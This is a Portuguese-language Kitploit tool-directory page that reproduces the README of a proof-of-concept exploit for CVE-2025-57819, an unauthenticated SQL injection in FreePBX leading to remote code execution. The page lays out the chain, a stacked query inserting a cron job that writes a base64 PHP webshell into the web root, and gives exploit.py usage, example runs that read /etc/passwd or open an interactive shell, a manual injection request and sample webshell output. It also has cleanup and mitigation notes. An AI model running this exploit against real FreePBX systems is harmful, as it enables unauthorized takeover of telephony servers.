Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/neobee714/cve-2025-57819-poc
Scanners de VulnerabilidadesAnálise de CódigoExploraçãoSegurança WebAprendizado e Educação
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

FreePBX injeção SQL não autenticada levando à execução remota de código, FreePBX 15 (abaixo de 15.0.66), 16 (abaixo de 16.0.89), 17 (abaixo de 17.0.3). A vulnerabilidade está localizada no módulo "endpoint" comercial, devido à filtragem insuficiente da entrada do usuário, permitindo que atacantes não autenticados contornem privilégios de administrador, executem injeção SQL e, por fim, alcancem a execução remota de código.

há 1 mêsAinda não revisado
Compartilhar

CVE-2025-57819 — Injeção SQL no FreePBX → PoC de RCE

CVE-2025-57819 é uma vulnerabilidade crítica de injeção de SQL no FreePBX que permite a um atacante não autenticado obter execução remota de código ao encadear uma injeção de SQL com injeção de cron job.

⚠️ Aviso: Este repositório destina-se apenas a testes de segurança autorizados e fins educacionais. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. O autor não é responsável por qualquer uso indevido ou dano.


Visão Geral da Vulnerabilidade

CampoDetalhe
CVECVE-2025-57819
Produto AfetadoFreePBX (pré-autenticação)
Tipo de VulnerabilidadeInjeção de SQL (consultas empilhadas)
ImpactoExecução Remota de Código (RCE)
Vetor de AtaqueRede (HTTP GET)
Autenticação Necessária❌ Nenhuma

Cadeia do Exploit

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. Injeção de SQL                                              │
│    POST /admin/ajax.php?brand= → consulta empilhada            │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Injeção de Cron Job                                         │
│    O cron job malicioso grava uma webshell PHP decodificada    │
│    em base64 em /var/www/html/shell.php                        │
├────────────────────────────────────────────────────────────────┤
│ 3. Acesso à WebShell                                           │
│    GET /shell.php?cmd=<comando> → execução arbitrária de código│
└────────────────────────────────────────────────────────────────┘

Como Funciona

  1. O endpoint /admin/ajax.php processa o parâmetro brand sem sanitização adequada, permitindo consultas SQL empilhadas.
  2. O atacante injeta uma instrução INSERT INTO cron_jobs que agenda um comando malicioso a cada minuto.
  3. O cron job decodifica uma webshell PHP codificada em base64 e a grava na raiz web.
  4. Uma vez gravada, o atacante pode executar comandos arbitrários do sistema por meio da webshell.

Início Rápido

root@kitploit:~
# Clone
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Install dependency
pip install requests

# Basic usage
python exploit.py <target>

# Drop into interactive shell after injection
python exploit.py <target> --shell

# Execute a single command
python exploit.py <target> --cmd "cat /etc/passwd"

Uso

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                target hostname or IP (with optional scheme)

options:
  -h, --help            show this help message and exit
  -p, --port PORT       port (default: 80/443)
  --shell               drop into interactive shell after injection
  --cmd CMD             execute a single command via the webshell
  --param PARAM         webshell query-string parameter (default: cmd)
  --no-wait             skip the webshell-verification poll
  -v, -vv               increase verbosity (-v info, -vv debug)

Exemplos

root@kitploit:~
# Target with default HTTP port
python exploit.py connected.htb

# Target with custom port
python exploit.py 10.10.11.100 -p 8080

# Inject, verify, and drop into interactive shell
python exploit.py 10.10.11.100 --shell

# Inject and run a single command
python exploit.py connected.htb --cmd "whoami"

# Skip the verification poll (if you already know the shell is live)
python exploit.py connected.htb --no-wait --cmd "id"

# Verbose output for debugging
python exploit.py connected.htb -vv --shell

Shell Interativa

Ao usar --shell, o script entra em um pseudo-terminal:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell session ended.

Digite exit (ou Ctrl-C, Ctrl-D) para sair da sessão.


Verificação Manual

Se você preferir etapas manuais, o exploit faz três coisas:

Passo 1 – Injetar o cron job

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

Passo 2 – Aguardar ~60 segundos para o cron ser executado

O cron job injetado (* * * * *) é executado a cada minuto e grava a webshell.

Passo 3 – Acessar a webshell

root@kitploit:~
GET /shell.php?cmd=id

Limpeza

Após o teste, remova a webshell e a entrada do cron job:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

Em seguida, exclua /var/www/html/shell.php do sistema de arquivos.


Versões Afetadas

  • Versões do FreePBX anteriores ao patch do fornecedor
  • Sistemas em que /admin/ajax.php está acessível sem autenticação

Mitigação

  • Aplique imediatamente o patch de segurança fornecido pelo fornecedor
  • Restrinja o acesso à interface administrativa do FreePBX
  • Garanta que o usuário do banco de dados do FreePBX tenha privilégios mínimos (defesa em profundidade)

Referências

  • Avisos de Segurança do FreePBX
  • OWASP SQL Injection

Licença

Este projeto é fornecido apenas para fins educacionais e de pesquisa defensiva de segurança. Consulte o aviso no topo deste documento.

Baixar ferramenta